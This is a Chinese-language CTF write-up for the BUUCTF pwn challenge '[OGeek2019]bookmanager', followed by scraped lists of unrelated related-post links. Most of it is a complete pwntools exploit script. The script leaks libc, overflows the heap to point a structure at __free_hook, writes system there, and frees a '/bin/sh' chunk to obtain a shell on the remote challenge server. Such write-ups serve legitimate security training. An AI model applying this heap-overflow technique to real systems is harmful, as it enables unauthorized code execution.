做过的代码量最大的一个题

说出的好也好,不好也不好,利用点很简单,就是一个大规模的heapoverflow,就是逆起来有点儿难度

思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook

给整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||

 1 from pwn import *

 2

 3 local = 0

 4

 5 binary = "./pwn"

 6

 7 if local == 1:

 8     p = process(binary)

 9 else:

10     p = remote("node3.buuoj.cn",27329)

11

12 def dbg():

13     context.log_level = 'debug'

14

15 context.terminal = ['tmux','splitw','-h']

16

17 def create_book(name):

18     p.sendafter('Name of the book you want to create:',name)

19

20 def add_chapter(name):

21     p.sendlineafter('Your choice:','1')

22     p.sendafter('Chapter name:',name)

23

24 def add_section(chapter_name,name):

25     p.sendlineafter('Your choice:','2')

26     p.sendafter('Which chapter do you want to add into:',chapter_name)

27     p.sendafter('Section name:',name)

28

29 def add_text(section_name,size,name):

30     p.sendlineafter('Your choice:','3')

31     p.sendafter('Which section do you want to add into:',section_name)

32     p.sendafter('How many chapters you want to write:',str(size))

33     p.sendafter('Text:',name)

34

35 def remove_chapter(chapter_name):

36     p.sendlineafter('Your choice:','4')

37     p.sendafter('Chapter name:',chapter_name)

38

39 def remove_section(section_name):

40     p.sendlineafter('Your choice:','5')

41     p.sendafter('Section name:',section_name)

42

43 def remove_text(section_name):

44     p.sendlineafter('Your choice:','6')

45     p.sendafter('Section name:',section_name)

46

47 def show():

48     p.sendlineafter('Your choice:','7')

49

50 def edit_text(sectionname,newname):

51     p.sendlineafter('Your choice:','8')

52     p.sendlineafter('What to update?(Chapter/Section/Text):','Text')

53     p.sendafter('Section name:',sectionname)

54     p.sendafter('New Text:',newname)

55

56 def edit_section(old_sectionname,newname):

57     p.sendlineafter('Your choice:','8')

58     p.sendlineafter('What to update?(Chapter/Section/Text):','Section')

59     p.sendafter('Section name:',old_sectionname)

60     p.sendafter('New Section name:',newname)

61

62 libc = ELF('./libc-2.23.so')

63

64 create_book('lemon')

65

66 print "==== step1: leak libc ===="

67 add_chapter('one')

68 add_section('one','c' * 8)

69 add_text('c' * 8,0x80,'d' * 8)

70

71 add_chapter('\x01')

72

73 remove_text('cccccccc')

74 add_text('cccccccc',0x80,'aaaaaaaa')

75 show()

76 __malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10

77 libc_base = __malloc_hook - libc.sym['__malloc_hook']

78 __free_hook = libc_base + libc.sym['__free_hook']

79 system = libc_base + libc.sym['system']

80 print "libc base: ",hex(libc_base)

81

82 print "==== step2: heapoverflow make heap pointer to free hook ===="

83 add_text('cccccccc',0x10,'\x01')

84 payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook)

85 add_section('one','dddddddd')

86 #dbg()

87 edit_text('cccccccc',payload)

88 edit_text('dddddddd',p64(system))

89 remove_text('cccccccc')

90

91 #gdb.attach(p)

92 p.interactive()

[OGeek2019]bookmanager的更多相关文章

  1. execution(* *..BookManager.save(..))的解读

    execution(* *..BookManager.save(..))的解读: 第一颗* 代表ret-type-pattern 返回值可任意, *..BookManager 代表任意Pacakge里 ...

  2. [BUUCTF]PWN7——[OGeek2019]babyrop

    [BUUCTF]PWN7--[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启 ...

  3. buuctf@[OGeek2019]babyrop

    #!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn', ...

  4. 张高兴的 UWP 开发笔记:横向 ListView

    ListView 默认的排列方向是纵向 ( Orientation="Vertical" ) ,但如果我们需要横向显示的 ListView 怎么办? Blend for Visua ...

  5. AIDL使用解析

    简书本文地址:点击跳转到简书查看 之前面试的时候被问到这个问题,然而当时只有一个大致的印象,随GG,于是我就重新整理的一下.这里大力推荐<Android开发艺术探索>这本书,写的太好了! ...

  6. Android 进程通信机制之 AIDL

    什么是 AIDL AIDL 全称 Android Interface Definition Language,即 安卓接口描述语言.听起来很深奥,其实它的本质就是生成进程间通信接口的辅助工具.它的存在 ...

  7. 设计模式之美:Manager(管理器)

    索引 意图 结构 参与者 适用性 效果 实现 实现方式(一):Manager 模式的示例实现. 意图 将对一个类的所有对象的管理封装到一个单独的管理器类中. 这使得管理职责的变化独立于类本身,并且管理 ...

  8. Lucene.net站内搜索—6、站内搜索第二版

    目录 Lucene.net站内搜索—1.SEO优化 Lucene.net站内搜索—2.Lucene.Net简介和分词Lucene.net站内搜索—3.最简单搜索引擎代码Lucene.net站内搜索—4 ...

  9. 轻松掌握:JavaScript享元模式

    享元模式 在JavaScript中,浏览器特别是移动端的浏览器分配的内存很有限,如何节省内存就成了一件非常有意义的事情.节省内存的一个有效方法是减少对象的数量. 享元模式(Flyweight),运行共 ...

随机推荐

  1. 使用AOP和Validator技术对项目接口中的参数进行非空等校验

    javax.validation.Validator基础知识补充: validator用来校验注解的生效,如: @NotBlank(message = "地址名不能为空") pri ...

  2. 开源两个spring api项目

    开源两个spring api项目 转载请注明出处: https://www.cnblogs.com/funnyzpc/p/13762616.html 工作也有五年有余了,中间一直迫于时间或能力没从零开 ...

  3. makefile实验二 对目标的深入理解 以及rebuild build clean的实现

    (一) rebuild build clean的实现 新知识点: 当一个目标的依赖是一个伪目标时,这个伪目标的规则一定会被执行. 贴实验代码 CC := gcc Target := helloworl ...

  4. What number should I guess next ?——由《鹰蛋》一题引发的思考

    What number should I guess next ? 这篇文章的灵感来源于最近技术部的团建与著名的DP优化<鹰蛋>.记得在一个月前,查到鹰蛋的题解前,我在与同学讨论时,一直试 ...

  5. Java知识系统回顾整理01基础04操作符06三元运算符

    一.三元运算符 表达式?值1:值2 如果表达式为真 返回值1 如果表达式为假 返回值2 if语句学习链接:if语句 public class HelloWorld { public static vo ...

  6. CF724G 【Xor-matic Number of the Graph】

    题目就不翻译了吧,应该写的很清楚了... 首先 \(,\) 不懂线性基的可以戳这里.知道了线性基\(,\) 但是从来没有写过线性基和图论相结合的\(,\) 可以戳这里. 好\(,\) 点完了这些前置技 ...

  7. Spring Cloud Config配置git私钥出错

    重装了电脑之后,重新生成了ssh key文件id_rsa和id_rsa.pub文件. 然后在配置中心的配置了私钥之后启动项目,报错如下: Reason: Property 'spring.cloud. ...

  8. Oracle缓存表与Oracle缓存的区别

    一.Oracle缓存表 与 Oracle缓存 的概念 Oracle 缓存:是把Oracle近期查询的语句放置在Oracle设定的缓存当中. Oracle 缓存表:是把某个表放置在缓存当中,缓存是Ora ...

  9. RHSA-2018:3032-低危: binutils 安全和BUG修复更新

    [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) 修复命令: 使用root账号登陆She ...

  10. php上传图片,网站代码

    1.php代码 2.表设置结构 3.jquery代码 4.显示网站的数据 6.上传图片 7.上传图片的php代码